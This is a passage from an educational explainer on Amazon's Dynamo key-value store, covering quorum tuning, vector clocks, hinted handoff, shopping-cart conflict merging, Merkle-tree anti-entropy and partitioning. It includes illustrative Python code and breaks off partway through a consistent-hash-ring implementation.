N = 3  # Three replicas for durability
R = 1  # Read from any single healthy node
W = 1  # Write to any single healthy node

# Trade-off analysis:
# ✓ Writes succeed even if 2 out of 3 nodes are down
# ✓ Reads succeed even if 2 out of 3 nodes are down
# ✓ Maximum availability - never reject customer actions
# ✗ Might read stale data
# ✗ Higher chance of conflicts (but we can merge shopping carts)

What happens during failure:

Client: "Add item to cart"
Coordinator tries N=3 nodes:
- Node 1: ✗ Down
- Node 2: ✓ ACK (W=1 satisfied!)
- Node 3: Still waiting...

Result: SUCCESS returned to client immediately
Node 3 eventually gets the update (eventual consistency)

Scenario 2: Session State (Balanced Approach)

N = 3
R = 2  # Must read from 2 nodes
W = 2  # Must write to 2 nodes

# Trade-off analysis:
# ✓ R + W = 4 > N = 3 → Read-your-writes guaranteed
# ✓ Tolerates 1 node failure
# ✓ Good balance of consistency and availability
# ✗ Write fails if 2 nodes are down
# ✗ Read fails if 2 nodes are down

Why R + W > N enables read-your-writes:

Write to W=2 nodes: [A, B]
Later, read from R=2 nodes: [B, C]

Because W + R = 4 > N = 3, there's guaranteed overlap!
At least one node (B in this case) will have the latest data.

The coordinator detects the newest version by comparing vector clocks.
This guarantees seeing the latest write as long as reconciliation
picks the causally most-recent version correctly.

Scenario 3: Financial Data (Prioritize Consistency)

N = 3
R = 3  # Must read from ALL nodes
W = 3  # Must write to ALL nodes

# Trade-off analysis:
# ✓ Full replica quorum — reduces likelihood of divergent versions
# ✓ Any read will overlap every write quorum
# ✗ Write fails if ANY node is down
# ✗ Read fails if ANY node is down
# ✗ Poor availability during failures

Systems requiring strict transactional guarantees typically choose CP systems instead. This configuration is technically supported by Dynamo but sacrifices the availability properties that motivate using it in the first place.

Configuration Comparison Table

Config	N	R	W	Availability	Consistency	Use Case
High Availability	3	1	1	⭐⭐⭐⭐⭐	⭐⭐	Shopping cart, wish list
Balanced	3	2	2	⭐⭐⭐⭐	⭐⭐⭐⭐	Session state, user preferences
Full Quorum	3	3	3	⭐⭐	⭐⭐⭐⭐⭐	High-stakes reads (not linearizable)
Read-Heavy	3	1	3	⭐⭐⭐ (reads)	⭐⭐⭐⭐	Product catalog, CDN metadata
Write-Heavy	3	3	1	⭐⭐⭐ (writes)	⭐⭐⭐	Click tracking, metrics

Note on financial systems: Systems requiring strong transactional guarantees (e.g., bank account balances) typically shouldn't use Dynamo. That said, some financial systems do build on Dynamo-style storage for their persistence layer while enforcing stronger semantics at the application or business logic layer.

The Key Insight

Most systems use N=3, R=2, W=2 because:

Durability: Can tolerate up to 2 replica failures before permanent data loss (assuming independent failures and no correlated outages).
Availability: Tolerates 1 node failure for both reads and writes
Consistency: R + W > N guarantees that read and write quorums overlap, enabling read-your-writes behavior in the absence of concurrent writes.
Performance: Don't wait for the slowest node (only need 2 out of 3)

Real production numbers from the paper:

Amazon's shopping cart service during peak (holiday season):

Configuration: N=3, R=2, W=2
Handled tens of millions of requests
Over 3 million checkouts in a single day
No downtime, even with server failures

This tunable approach is what made Dynamo revolutionary. You're not stuck with one-size-fits-all—you tune it based on your actual business requirements.

3. Vector Clocks for Versioning

The Problem: Detecting Causality in Distributed Systems

When multiple nodes can accept writes independently, you need to answer a critical question: Are these two versions of the same data related, or were they created concurrently?

Why timestamps don't work:

Scenario: Two users edit the same shopping cart simultaneously

User 1 at 10:00:01.500 AM: Adds item A → Writes to Node X
User 2 at 10:00:01.501 AM: Adds item B → Writes to Node Y

Physical timestamp says: User 2's version is "newer"
Reality: These are concurrent! Both should be kept!

Problem: 
- Clocks on different servers are NEVER perfectly synchronized
- Clock skew can be seconds or even minutes
- Network delays are unpredictable
- Physical time doesn't capture causality

What we really need to know:

Version A happened before Version B?     → B can overwrite A
Version A and B are concurrent?          → Keep both, merge later
Version A came from reading Version B?   → We can track this!

The Solution: Vector Clocks

A vector clock is a simple data structure: a list of (node_id, counter) pairs that tracks which nodes have seen which versions.

The rules:

When a node writes data, it increments its own counter
When a node reads data, it gets the vector clock
When comparing two vector clocks:
- If all counters in A ≤ counters in B → A is an ancestor of B (B is newer)
- If some counters in A > B and some B > A → A and B are concurrent (conflict!)

Step-by-Step Example

Let's trace a shopping cart through multiple updates:

Breaking down the conflict:

D3: [Sx:2, Sy:1]  vs  D4: [Sx:2, Sz:1]

Comparing:
- Sx: 2 == 2  ✓ (equal)
- Sy: 1 vs missing in D4  → D3 has something D4 doesn't
- Sz: missing in D3 vs 1  → D4 has something D3 doesn't

Conclusion: CONCURRENT! Neither is an ancestor of the other.
Both versions must be kept and merged.

Real-World Characteristics

The Dynamo paper reports the following conflict distribution measured over 24 hours of Amazon's production shopping cart traffic. These numbers reflect Amazon's specific workload — high read/write ratio, mostly single-user sessions — and should not be assumed to generalize to all Dynamo deployments:

99.94%    - Single version (no conflict)
0.00057%  - 2 versions
0.00047%  - 3 versions  
0.00009%  - 4 versions

Key insight: Conflicts are RARE in practice!

Why conflicts happen:

Not usually from network failures
Mostly from concurrent writers (often automated processes/bots)
Human users rarely create conflicts because they're slow compared to network speed

The Size Problem

Vector clocks can grow unbounded if many nodes coordinate writes. Dynamo's solution: truncate the oldest entries once the clock exceeds a size threshold.

// When vector clock exceeds threshold (e.g., 10 entries)
// Remove the oldest entry based on wall-clock timestamp

vectorClock = {
  'Sx': {counter: 5, timestamp: 1609459200},
  'Sy': {counter: 3, timestamp: 1609459800},
  'Sz': {counter: 2, timestamp: 1609460400},
  // ... 10 more entries
}

// If size > 10, remove entry with oldest timestamp
// ⚠ Risk: Dropping an entry collapses causality information.
//   Two versions that were causally related may now appear
//   concurrent, forcing the application to resolve a conflict
//   that didn't actually exist. In practice, Amazon reports
//   this has not been a significant problem — but it is a
//   real theoretical risk in high-churn write environments
//   with many distinct coordinators.

4. Sloppy Quorum and Hinted Handoff

The Problem: Strict Quorums Kill Availability

Traditional quorum systems are rigid and unforgiving.

Traditional strict quorum:

Your data is stored on nodes: A, B, C (preference list)
Write requirement: W = 2

Scenario: Node B is down for maintenance

Coordinator: "I need to write to 2 nodes from {A, B, C}"
Tries: A ✓, B ✗ (down), C ✓
Result: SUCCESS (got 2 out of 3)

Scenario: Nodes B AND C are down

Coordinator: "I need to write to 2 nodes from {A, B, C}"
Tries: A ✓, B ✗ (down), C ✗ (down)
Result: FAILURE (only got 1 out of 3)

Customer: "Why can't I add items to my cart?!" 😡

The problem: Strict quorums require specific nodes. If those specific nodes are down, the system becomes unavailable.

Real scenario at Amazon:

Black Friday, 2:00 PM
- Datacenter 1: 20% of nodes being rebooted (rolling deployment)
- Datacenter 2: Network hiccup (1-2% packet loss)
- Traffic: 10x normal load

With strict quorum:
- 15% of write requests fail
- Customer support phones explode
- Revenue impact: Millions per hour

The Solution: Sloppy Quorum

Dynamo relaxes the quorum requirement: "Write to the first N healthy nodes in the preference list, walking further down the ring if needed."

Preference list for key K: A, B, C
But B is down...

Sloppy Quorum says:
"Don't give up! Walk further down the ring:
 A, B, C, D, E, F, ..."

Coordinator walks until N=3 healthy nodes are found: A, C, D
(D is a temporary substitute for B)

How Hinted Handoff Works

When a node temporarily substitutes for a failed node, it stores a "hint" with the data.

Detailed Hinted Handoff Process

Step 1: Detect failure and substitute

def write_with_hinted_handoff(key, value, N, W):
    preference_list = get_preference_list(key)  # [A, B, C]

    healthy_nodes = []
    for node in preference_list:
        if is_healthy(node):
            healthy_nodes.append((node, is_hint=False))

    # If we don't have N healthy nodes, expand the list
    if len(healthy_nodes) < N:
        extended_list = get_extended_preference_list(key)
        for node in extended_list:
            if node not in preference_list and is_healthy(node):
                healthy_nodes.append((node, is_hint=True))
            if len(healthy_nodes) >= N:
                break

    # Write to first N healthy nodes
    acks = 0
    for node, is_hint in healthy_nodes[:N]:
        if is_hint:
            # Store with hint metadata
            intended_node = find_intended_node(preference_list, node)
            success = node.write_hinted(key, value, hint=intended_node)
        else:
            success = node.write(key, value)

        if success:
            acks += 1
            if acks >= W:
                return SUCCESS

    return FAILURE

Step 2: Background hint transfer

# Runs periodically on each node (e.g., every 10 seconds)
def transfer_hints():
    hints_db = get_hinted_replicas()

    for hint in hints_db:
        intended_node = hint.intended_for

        if is_healthy(intended_node):
            try:
                intended_node.write(hint.key, hint.value)
                hints_db.delete(hint)
                log(f"Successfully transferred hint to {intended_node}")
            except:
                log(f"Will retry later for {intended_node}")

Why This Is Brilliant

Durability maintained:

Even though B is down:
- We still have N=3 copies: A, C, D
- Data won't be lost even if another node fails
- System maintains durability guarantee

Availability maximized:

Client perspective:
- Write succeeds immediately
- No error message
- No retry needed
- Customer happy

Traditional quorum would have failed:
- Only 2 nodes available (A, C)
- Need 3 for N=3
- Write rejected
- Customer sees error

Eventual consistency:

Timeline:
T=0:    Write succeeds (A, C, D with hint)
T=0-5min: B is down, but system works fine
T=5min: B recovers
T=5min+10sec: D detects B is back, transfers hint
T=5min+11sec: B has the data, D deletes hint

Result: Eventually, all correct replicas have the data

Configuration Example

// High availability configuration
const config = {
  N: 3,           // Want 3 replicas
  W: 2,           // Only need 2 ACKs to succeed
  R: 2,           // Read from 2 nodes

  // Sloppy quorum allows expanding preference list
  sloppy_quorum: true,

  // How far to expand when looking for healthy nodes
  max_extended_preference_list: 10,

  // How often to check for hint transfers
  hint_transfer_interval: 10_seconds,

  // How long to keep trying to transfer hints
  hint_retention: 7_days
};

Real-World Impact

From Amazon's production experience:

During normal operation:

Hinted handoff rarely triggered
Most writes go to preferred nodes
Hints database is mostly empty

During failures:

Scenario: 5% of nodes failing at any time (normal at Amazon's scale)

Without hinted handoff:
- Write success rate: 85%
- Customer impact: 15% of cart additions fail

With hinted handoff:
- Write success rate: 99.9%+
- Customer impact: Nearly zero

During datacenter failure:

Scenario: Entire datacenter unreachable (33% of nodes)

Without hinted handoff:
- Many keys would lose entire preference list
- Massive write failures
- System effectively down

With hinted handoff:
- Writes redirect to other datacenters
- Hints accumulate temporarily
- When datacenter recovers, hints transfer
- Zero customer-visible failures

The Trade-off

Benefits:

✓ Maximum write availability
✓ Durability maintained during failures
✓ Automatic recovery when nodes come back
✓ No manual intervention required

Costs:

✗ Temporary inconsistency (data not on "correct" nodes)
✗ Extra storage for hints database
✗ Background bandwidth for hint transfers
✗ Slightly more complex code
✗ Hinted handoff provides temporary durability, not permanent replication. If a substitute node (like D) fails before it can transfer its hint back to B, the number of true replicas drops below N until the situation resolves. This is an important edge case to understand in failure planning.

Amazon's verdict: The availability benefits far outweigh the costs for e-commerce workloads.

Conflict Resolution: The Shopping Cart Problem

Let's talk about the most famous example from the paper: the shopping cart. This is where rubber meets road.

What Is a Conflict (and Why Does It Happen)?

A conflict occurs when two writes happen to the same key on different nodes, without either write "knowing about" the other. This is only possible because Dynamo accepts writes even when nodes can't communicate—which is the whole point!

Here's a concrete sequence of events that creates a conflict:

Timeline:
T=0:  Customer logs in. Cart has {shoes} on all 3 nodes.
T=1:  Network partition: Node1 can't talk to Node2.
T=2:  Customer adds {jacket} on their laptop → goes to Node1.
      Cart on Node1: {shoes, jacket}   ← Vector clock: [N1:2]
T=3:  Customer adds {hat} on their phone → goes to Node2.
      Cart on Node2: {shoes, hat}      ← Vector clock: [N2:2]
T=4:  Network heals. Node1 and Node2 compare notes.
      Node1 says: "I have version [N1:2]"
      Node2 says: "I have version [N2:2]"
      Neither clock dominates the other → CONFLICT!

Neither version is "wrong"—both represent real actions the customer took. Dynamo's job is to detect this situation (via vector clocks) and surface both versions to the application so the application can decide what to do.

What Does the Application Do With a Conflict?

This is the crucial part that the paper delegates to you: the application must resolve conflicts using business logic. Dynamo gives you all the concurrent versions; your code decides how to merge them.

For the shopping cart, Amazon chose a union merge: keep all items from all concurrent versions. The rationale is simple—losing an item from a customer's cart (missing a sale) is worse than occasionally showing a stale item they already deleted.

Conflict versions:
  Version A (from Node1): {shoes, jacket}
  Version B (from Node2): {shoes, hat}

Merge strategy: union
  Merged cart: {shoes, jacket, hat}  ← All items preserved

Here's the actual reconciliation code:

from __future__ import annotations
from dataclasses import dataclass, field


class VectorClock:
    def __init__(self, clock: dict[str, int] | None = None):
        self.clock: dict[str, int] = clock.copy() if clock else {}

    def merge(self, other: "VectorClock") -> "VectorClock":
        """Merged clock = max of each node's counter across both versions."""
        all_keys = set(self.clock) | set(other.clock)
        merged = {k: max(self.clock.get(k, 0), other.clock.get(k, 0)) for k in all_keys}
        return VectorClock(merged)

    def __repr__(self):
        return f"VectorClock({self.clock})"


@dataclass
class ShoppingCart:
    items: list[str] = field(default_factory=list)
    vector_clock: VectorClock = field(default_factory=VectorClock)

    @staticmethod
    def reconcile(carts: list["ShoppingCart"]) -> "ShoppingCart":
        if len(carts) == 1:
            return carts[0]  # No conflict, nothing to do

        # Merge strategy: union of all items (never lose additions).
        # This is Amazon's choice for shopping carts.
        # A different application might choose last-write-wins or something else.
        all_items: set[str] = set()
        merged_clock = VectorClock()

        for cart in carts:
            all_items.update(cart.items)          # Union: keep everything
            merged_clock = merged_clock.merge(cart.vector_clock)

        return ShoppingCart(items=sorted(all_items), vector_clock=merged_clock)


# Example conflict scenario
cart1 = ShoppingCart(items=["shoes", "jacket"], vector_clock=VectorClock({"N1": 2}))
cart2 = ShoppingCart(items=["shoes", "hat"],    vector_clock=VectorClock({"N2": 2}))

# Dynamo detected a conflict and passes both versions to our reconcile()
reconciled = ShoppingCart.reconcile([cart1, cart2])
print(reconciled.items)  # ['hat', 'jacket', 'shoes'] — union!

The Deletion Problem (Why This Gets Tricky)

The union strategy has a nasty edge case: deleted items can come back from the dead.

T=0:  Cart: {shoes, hat}
T=1:  Customer removes hat → Cart: {shoes}           Clock: [N1:3]
T=2:  Network partition — Node2 still has old state
T=3:  Some concurrent write to Node2                  Clock: [N2:3]
T=4:  Network heals → conflict detected
T=5:  Union merge: {shoes} ∪ {shoes, hat} = {shoes, hat}

Result: Hat is BACK! Customer removed it, but it reappeared.

Amazon explicitly accepts this trade-off. A "ghost" item in a cart is a minor annoyance. Losing a cart addition during a Black Friday sale is lost revenue.

Engineering depth note: Merge logic must be domain-specific and carefully designed. Adding items is commutative (order doesn't matter) and easy to merge. Removing items is not—a deletion in one concurrent branch may be silently ignored during a union-based merge. This is an intentional trade-off in Dynamo's design, but it means the application must reason carefully about add vs. remove semantics. If your data doesn't naturally support union merges (e.g., a counter, a user's address), you need a different strategy—such as CRDTs, last-write-wins with timestamps, or simply rejecting concurrent writes for that data type.

Read and Write Flow

The diagrams above show the high-level flow, but let's walk through what actually happens step-by-step during a read and a write. Understanding this concretely will make the earlier concepts click.

Write Path

Step-by-step narration of a PUT request:

Client sends the request to any node (via a load balancer) or directly to the coordinator.
The coordinator is determined — this is the first node in the preference list for the key's hash position on the ring.
Vector clock is updated — the coordinator increments its own counter in the vector clock, creating a new version.
The coordinator writes locally, then fans out the write to the other N-1 nodes in the preference list simultaneously.
The coordinator waits for W acknowledgments. It does NOT wait for all N — just the first W to respond. The remaining nodes that haven't responded yet will get the write eventually (or via hinted handoff if they're down).
Once W ACKs arrive, the coordinator returns 200 OK to the client. From the client's perspective, the write is done.

Key insight about the write path: The client gets a success response as soon as W nodes confirm. The other (N - W) nodes will receive the write asynchronously. This is why the system is "eventually consistent"—all nodes will have the data, just not necessarily at the same moment.

Read Path

Step-by-step narration of a GET request:

Client sends the request to the coordinator for that key.
The coordinator sends read requests to all N nodes in the preference list simultaneously (not just R). This is important — it contacts all N, but only needs R to respond.
Wait for R responses. The coordinator returns as soon as R nodes have replied, without waiting for the slower ones.
Compare the versions returned. The coordinator checks all the vector clocks:
- If all versions are identical → return the single version immediately.
- If one version's clock dominates the others (it's causally "newer") → return that version.
- If versions are concurrent (neither clock dominates) → return all versions to the client, which must merge them.
Read repair happens in the background: if the coordinator noticed any node returned a stale version, it sends the latest version to that node to bring it up to date.

Why does the client receive the conflict instead of the coordinator resolving it? Because Dynamo is a general-purpose storage engine. It doesn't know whether you're storing a shopping cart, a user profile, or a session token. Only your application knows how to merge two conflicting versions in a way that makes business sense. The coordinator hands you the raw concurrent versions along with the vector clock context, and you do the right thing for your use case.

The vector clock context is the key to closing the loop: when the client writes the merged version back, it must include the context (the merged vector clock). This tells Dynamo that the new write has "seen" all the concurrent versions, so the conflict is resolved. Without this context, Dynamo might think it's another concurrent write on top of the still-unresolved conflict.

Merkle Trees for Anti-Entropy

The Problem: How Do You Know When Replicas Are Out of Sync?

After a node recovers from a failure, it may have missed some writes. After a network partition heals, two replicas might diverge. How does Dynamo detect and fix these differences?

The brute-force approach would be: "Every hour, compare every key on Node A against Node B, and sync anything that's different." But at Amazon's scale, a single node might store hundreds of millions of keys. Comparing them all one by one would be so slow and bandwidth-intensive that it would interfere with normal traffic.

Dynamo uses Merkle trees to solve this efficiently. The core idea: instead of comparing individual keys, compare hashes of groups of keys. If the hash matches, that whole group is identical—skip it. Only drill down into groups where hashes differ.

Important: Merkle tree sync is a background anti-entropy mechanism. It's not on the hot read/write path. Normal reads and writes use vector clocks and quorums for versioning. Merkle trees are for the repair process that runs periodically in the background to catch any inconsistencies that slipped through.

How a Merkle Tree Is Built

Each node builds a Merkle tree over its data, organized by key ranges:

Leaf nodes contain the hash of a small range of actual data keys (e.g., hash of all values for keys k1, k2, k3).
Internal nodes contain the hash of their children's hashes.
The root is a single hash representing all the data on the node.

How Two Nodes Sync Using Merkle Trees

When Node A and Node B want to check if they're in sync:

Step 1: Compare root hashes. If they're the same, everything is identical. Done! (No network traffic for the data itself.)

Step 2: If roots differ, compare their left children. Same? Skip that entire half of the key space.

Step 3: Keep descending only into subtrees where hashes differ, until you reach the leaf nodes.

Step 4: Sync only the specific keys in the differing leaf nodes.

Example: Comparing two nodes

Node A root: abc789  ← differs from Node B!
Node B root: abc788

Compare left subtrees:
  Node A left:  xyz123
  Node B left:  xyz123  ← same! Skip entire left half.

Compare right subtrees:
  Node A right: def456
  Node B right: def457  ← differs! Go deeper.

Compare right-left subtree:
  Node A right-left: ghi111
  Node B right-left: ghi111  ← same! Skip.

Compare right-right subtree:
  Node A right-right: jkl222
  Node B right-right: jkl333  ← differs! These are leaves.

→ Sync only the keys in the right-right leaf range (e.g., k10, k11, k12)
  Instead of comparing all 1 million keys, we compared 6 hashes
  and synced only 3 keys!

Synchronization process in code:

def sync_replicas(node_a, node_b, key_range):
    """
    Efficiently sync two nodes using Merkle trees.
    Instead of comparing all keys, we compare hashes top-down.
    Only the ranges where hashes differ need actual key-level sync.
    """
    tree_a = node_a.get_merkle_tree(key_range)
    tree_b = node_b.get_merkle_tree(key_range)

    # Step 1: Compare root hashes first.
    # If they match, every key in this range is identical — nothing to do!
    if tree_a.root_hash == tree_b.root_hash:
        return  # Zero data transferred — full match!

    # Step 2: Recursively find differences by traversing top-down.
    # Only descend into subtrees where hashes differ.
    differences = []
    stack = [(tree_a.root, tree_b.root)]

    while stack:
        node_a_subtree, node_b_subtree = stack.pop()

        if node_a_subtree.hash == node_b_subtree.hash:
            continue  # This whole subtree matches — skip it!

        if node_a_subtree.is_leaf:
            # Found a differing leaf — these keys need syncing
            differences.extend(node_a_subtree.keys)
        else:
            # Not a leaf yet — recurse into children
            for child_a, child_b in zip(node_a_subtree.children, node_b_subtree.children):
                stack.append((child_a, child_b))

    # Step 3: Sync only the specific keys that differed at leaf level.
    # This might be a handful of keys, not millions.
    for key in differences:
        sync_key(node_a, node_b, key)

Why This Is Efficient

The power of Merkle trees is that the number of hash comparisons you need scales with the depth of the tree (logarithmic in the number of keys), not the number of keys themselves.

Node with 1,000,000 keys:

Naive approach:  Compare 1,000,000 keys individually
                 Cost: 1,000,000 comparisons

Merkle tree:     Compare O(log N) hashes top-down
                 Tree depth ≈ 20 levels
                 Cost: 20 comparisons to find differences
                 Then sync only the differing leaves (~few keys)

Speedup: ~50,000x fewer comparisons!

And critically, if two nodes are mostly in sync (which is almost always true in a healthy cluster), the root hashes often match entirely and zero data needs to be transferred. The anti-entropy process is very cheap in the common case.

Membership and Failure Detection

Dynamo uses a gossip protocol for membership management. Each node periodically exchanges membership information with random peers. There is no master node—all coordination is fully decentralized.

Gossip-Based Membership

Key Design Points

No single coordinator: Every node maintains its own view of cluster membership. There's no central registry, so there's no single point of failure for membership data.

Failure suspicion vs. detection: Dynamo uses an accrual-based failure detector (similar to Phi Accrual). Rather than a binary "alive/dead" judgment, nodes maintain a suspicion level that rises the longer a peer is unresponsive. This avoids false positives from transient network hiccups.

Node A's view of Node B:
- Last heartbeat: 3 seconds ago → Suspicion low → Healthy
- Last heartbeat: 15 seconds ago → Suspicion rising → Likely slow/degraded
- Last heartbeat: 60 seconds ago → Suspicion high → Treat as failed

Decentralized bootstrapping: New nodes contact a seed node to join, then gossip spreads their presence to the rest of the cluster. Ring membership is eventually consistent—different nodes may have slightly different views of the ring momentarily, which is acceptable.

Performance Characteristics: Real Numbers

The paper provides fascinating performance data. Let me break it down:

Latency Distribution

Metric              | Average | 99.9th Percentile
--------------------|---------|------------------
Read latency        | ~10ms   | ~200ms
Write latency       | ~15ms   | ~200ms

Key insight: 99.9th percentile is ~20x the average!

Why the huge gap? The 99.9th percentile is affected by:

Garbage collection pauses
Disk I/O variations
Network jitter
Load imbalance

This is why Amazon SLAs are specified at 99.9th percentile, not average.

Version Conflicts

From 24 hours of Amazon's production shopping cart traffic (per the Dynamo paper). Note these reflect Amazon's specific workload characteristics, not a universal baseline:

99.94%    - Saw exactly one version (no conflict)
0.00057%  - Saw 2 versions
0.00047%  - Saw 3 versions  
0.00009%  - Saw 4 versions

Takeaway: Conflicts are rare in practice! Most often caused by concurrent writers (robots), not failures.

Partitioning Strategy Evolution

Dynamo evolved through three partitioning strategies. This evolution teaches us important lessons:

Strategy 1: Random Tokens (Initial)

Problem: Random token assignment → uneven load
Problem: Adding nodes → expensive data scans
Problem: Can't easily snapshot the system

Operational lesson: Random token assignment sounds elegant but is a nightmare in practice. Each node gets a random position on the ring, which means wildly different data ownership ranges and uneven load distribution.

Strategy 2: Equal-sized Partitions + Random Tokens

Improvement: Decouples partitioning from placement
Problem: Still has load balancing issues

Strategy 3: Q/S Tokens Per Node — Equal-sized Partitions + Deterministic Placement (Current)

What Q and S mean:

Q = the total number of fixed partitions the ring is divided into (e.g. 1024). Think of these as equally-sized, pre-cut slices of the hash space that never change shape.
S = the number of physical servers currently in the cluster (e.g. 8).
Q/S = how many of those fixed slices each server is responsible for (e.g. 1024 / 8 = 128 partitions per server).

The key shift from earlier strategies: the ring is now divided into Q fixed, equal-sized partitions first, and then those partitions are assigned evenly to servers. Servers no longer get random positions — they each own exactly Q/S partitions, distributed evenly around the ring.

Example: Q=12 partitions, S=3 servers

Ring divided into 12 equal slices (each covers 30° of the 360° ring):
  Partition  1:   0°– 30°  → Server A
  Partition  2:  30°– 60°  → Server B
  Partition  3:  60°– 90°  → Server C
  Partition  4:  90°–120°  → Server A
  Partition  5: 120°–150°  → Server B
  Partition  6: 150°–180°  → Server C
  ...and so on, round-robin

Each server owns exactly Q/S = 12/3 = 4 partitions → perfectly balanced.

When a 4th server joins (S becomes 4):
  New Q/S = 12/4 = 3 partitions per server.
  Each existing server hands off 1 partition to the new server.
  Only 3 out of 12 partitions move — the rest are untouched.

Benefits:
✓ Perfectly even load distribution (every server owns the same number of partitions)
✓ Fast bootstrapping — a joining node receives whole partition files, not scattered key ranges
✓ Easy archival — each partition is a self-contained file that can be snapshotted independently
✓ Membership metadata shrinks from multiple MB (hundreds of random tokens) to a few KB (a simple partition-to-server table)

This evolution — from random tokens to fixed, equal-sized partitions with balanced ownership — is one of the most instructive operational learnings from Dynamo. The early approach prioritized simplicity of implementation; the later approach prioritized operational simplicity and predictability.

Comparing Dynamo to Modern Systems

Let's see how Dynamo concepts appear in systems you might use today:

System	Consistency Model	Use Case	Dynamo Influence
Cassandra	Tunable (N, R, W)	Time-series, analytics	Direct descendant — heavily inspired by Dynamo, uses same consistent hashing and quorum concepts
Riak	Tunable, vector clocks	Key-value store	Closest faithful Dynamo implementation
Amazon DynamoDB	Eventually consistent by default	Managed NoSQL	⚠️ Not the same as Dynamo! DynamoDB is a completely different system internally, with no vector clocks and much simpler conflict resolution. Shares the name and high-level inspiration only.
Voldemort	Tunable	LinkedIn's data store	Open-source Dynamo implementation
Google Spanner	Linearizable	Global SQL	Opposite choice to Dynamo — prioritizes CP via TrueTime clock synchronization
Redis Cluster	Eventually consistent	Caching, sessions	Uses consistent hashing; much simpler conflict resolution

The DynamoDB confusion: Many engineers conflate Amazon DynamoDB with the Dynamo paper. They are very different. DynamoDB is a managed service optimized for operational simplicity. It does not expose vector clocks, does not use the same partitioning scheme, and uses a proprietary consistency model. The paper is about the internal Dynamo storage engine that predates DynamoDB.

What Dynamo Does NOT Give You

Every senior engineer blog should be honest about limitations. Here's what Dynamo explicitly trades away:

No transactions: Operations are single-key only. You can't atomically update multiple keys.
No secondary indexes: You can only look up data by its primary key (at least in the original design).
No joins: It's a key-value store. There is no query language.
No global ordering: Events across different keys have no guaranteed ordering.
No linearizability: Even at R=W=N, Dynamo does not provide linearizable reads. There is no global clock, no strict serializability.
No automatic conflict resolution: The system detects conflicts and surfaces them to the application. The application must resolve them. If your engineers don't understand this, you will have subtle data bugs.
Repair costs at scale: The anti-entropy process (Merkle tree reconciliation) is not free. At large scale, background repair traffic can be significant.
Vector clock growth: In high-churn write environments with many coordinators, vector clocks can grow large enough to require truncation, which introduces potential causality loss.

Understanding these limitations is critical to successfully operating Dynamo-style systems in production.

Practical Implementation Example

Below is a self-contained Python implementation of the core Dynamo concepts. It's intentionally simplified—no actual networking, no persistence—but it faithfully models how vector clocks, the consistent hash ring, quorum reads/writes, and conflict detection interact. Each component is explained before its code.

Part 1: Vector Clock

The VectorClock class is the foundation of version tracking. It's just a dictionary mapping node_id → counter. Two key operations:

increment(node) — bump our own counter when we write
dominates(other) — check if one clock is causally "after" another; if neither dominates, the writes were concurrent (conflict)

from __future__ import annotations
from dataclasses import dataclass, field
from typing import Optional


class VectorClock:
    """
    Tracks causality across distributed writes.

    A clock like {"nodeA": 2, "nodeB": 1} means:
      - nodeA has coordinated 2 writes
      - nodeB has coordinated 1 write
      - Any version with these counters has "seen" those writes
    """

    def __init__(self, clock: dict[str, int] | None = None):
        self.clock: dict[str, int] = clock.copy() if clock else {}

    def increment(self, node_id: str) -> "VectorClock":
        """Return a new clock with node_id's counter bumped by 1."""
        new_clock = self.clock.copy()
        new_clock[node_id] = new_clock.get(node_id, 0) + 1
        return VectorClock(new_clock)

    def dominates(self, other: "VectorClock") -> bool:
        """
        Returns True if self is causally AFTER other.

        self dominates other when:
          - Every counter in self is >= the same counter in other, AND
          - At least one counter in self is strictly greater.

        Meaning: self has seen everything other has seen, plus more.
        """
        all_keys = set(self.clock) | set(other.clock)
        at_least_one_greater = False
        for key in all_keys:
            self_val = self.clock.get(key, 0)
            other_val = other.clock.get(key, 0)
            if self_val < other_val:
                return False  # self is missing something other has seen
            if self_val > other_val:
                at_least_one_greater = True
        return at_least_one_greater

    def merge(self, other: "VectorClock") -> "VectorClock":
        """
        Merge two clocks by taking the max of each counter.
        Used after resolving a conflict to produce a new clock
        that has "seen" everything both conflicting versions saw.
        """
        all_keys = set(self.clock) | set(other.clock)
        merged = {k: max(self.clock.get(k, 0), other.clock.get(k, 0)) for k in all_keys}
        return VectorClock(merged)

    def __repr__(self):
        return f"VectorClock({self.clock})"

Part 2: Versioned Value

Every value stored in Dynamo is wrapped with its vector clock. This pairing is what allows the coordinator to compare versions during reads and detect conflicts.

@dataclass
class VersionedValue:
    """
    A value paired with its causal history (vector clock).

    When a client reads, they get back a VersionedValue.
    When they write an update, they must include the context
    (the vector clock they read) so Dynamo knows what version
    they're building on top of.
    """
    value: object
    vector_clock: VectorClock

    def __repr__(self):
        return f"VersionedValue(value={self.value!r}, clock={self.vector_clock})"

Part 3: Simulated Node

In real Dynamo each node is a separate process. Here we simulate them as in-memory objects. The key detail: each node has its own local storage dict. Nodes can be marked as down to simulate failures.

class DynamoNode:
    """
    Simulates a single Dynamo storage node.

    In production this would be a separate server with disk storage.
    Here it's an in-memory dict so we can demo the logic without networking.
    """

    def __init__(self, node_id: str, token: int):
        self.node_id = node_id
        self.token = token          # Position on the consistent hash ring
        self.storage: dict[str, list[VersionedValue]] = {}
        self.down = False           # Toggle to simulate node failures

    def write(self, key: str, versioned_value: VersionedValue) -> bool:
        """
        Store a versioned value. Returns False if the node is down.

        We store a LIST of versions per key, because a node might
        hold multiple concurrent (conflicting) versions until they
        are resolved by the application.
        """
        if self.down:
            return False
        # In a real node this would be written to disk (e.g. BerkeleyDB)
        self.storage[key] = [versioned_value]
        return True

    def read(self, key: str) -> list[VersionedValue] | None:
        """
        Return all versions of a key. Returns None if the node is down.
        A healthy node with no data for the key returns an empty list.
        """
        if self.down:
            return None
        return self.storage.get(key, [])

    def __repr__(self):
        status = "DOWN" if self.down else f"token={self.token}"
        return f"DynamoNode({self.node_id}, {status})"

Part 4: Consistent Hash Ring

The ring maps keys to nodes. We sort nodes by their token (position) and use a clockwise walk to find the coordinator and preference list for any key.

import hashlib


class ConsistentHashRing:
    """
    Maps any key to an ordered list of N nodes (the preference list).

    Nodes are placed at fixed positions (tokens) on a conceptual ring
    from 0 to 2^32. A key hashes to a position, then walks clockwise
    to find its nodes.

    This means adding/removing one node only rebalances ~1/N of keys,
    rather than reshuffling everything like modulo hashing would.
    """

    def __init__(self, nodes: list[DynamoNode]):
        # Sort nodes by token so we can do clockwise lookup efficiently
        self.nodes = sorted(nodes, key=lambda n: n.token)

    def _hash(self, key: str) -> int:
        """Consistent hash of a key into the ring's token space."""
        # Use MD5 for a simple, evenly distributed hash.
        # Real Dynamo uses a more sophisticated hash (e.g., SHA-1).
        digest = hashlib.md5(key.encode()).hexdigest()
        return int(digest, 16) % (2**32)

    def get_preference_list(self, key: str, n: int) -> list[DynamoNode]:
